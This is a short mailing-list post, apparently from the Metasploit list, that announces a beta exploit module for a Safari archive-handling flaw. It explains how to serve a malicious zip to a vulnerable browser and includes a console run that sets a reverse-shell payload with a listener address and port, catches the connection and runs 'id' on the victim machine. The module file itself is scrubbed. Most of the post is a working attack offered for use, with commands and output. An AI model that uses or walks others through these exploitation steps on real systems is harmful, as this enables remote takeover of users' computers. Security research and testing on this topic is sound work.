Safari Archive Metadata Command Execution

[hdm at metasploit.com (H D Moore)]

Hello,

Attached is a beta module for the Safari vulnerability announced today. 
The module depends on the 'zip' utility being in your path (MSFCygwin 
users should already have this installed). To use, load the module, 
select a payload, and then browse to the web service with a vulnerable 
version of Safari. It should automatically open the zip file and execute 
the shell script containing the payload.  Please mail me offlist if you 
encounter problems with this module. Thanks!

-HD

-- sample run --


msf > use safari_safefiles_exec
msf safari_safefiles_exec(cmd_re) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf safari_safefiles_exec(cmd_unix_reverse) > set LHOST 192.168.0.100
LHOST -> 192.168.0.100
msf safari_safefiles_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321
msf safari_safefiles_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.100:8080/
  adding: LR6E45uoWshn3.mov (deflated 24%)
  adding: __MACOSX/._LR6E45uoWshn3.mov (deflated 87%)
[*] HTTP Client connected from ME:49381, sending 98 bytes of payload...
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.167:49393 
192.168.0.100:4321 <-> 192.168.0.167:49392

id
uid=501(hdm) gid=501(hdm) groups=501(hdm), 79(appserverusr), 80(admin), 81
(appserveradm)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: safari_safefiles_exec.pm
Type: application/x-perl-module
Size: 13072 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060222/3d38b45a/attachment.bin>